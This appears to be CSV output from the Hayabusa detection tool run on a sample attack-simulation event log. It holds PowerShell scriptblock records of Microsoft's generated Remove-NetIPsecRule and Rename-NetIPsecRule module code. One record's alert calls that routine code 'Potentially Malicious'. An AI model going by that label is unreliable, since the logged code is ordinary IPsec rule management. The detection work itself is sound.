[Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] $",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
$",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"{Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] 
[ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 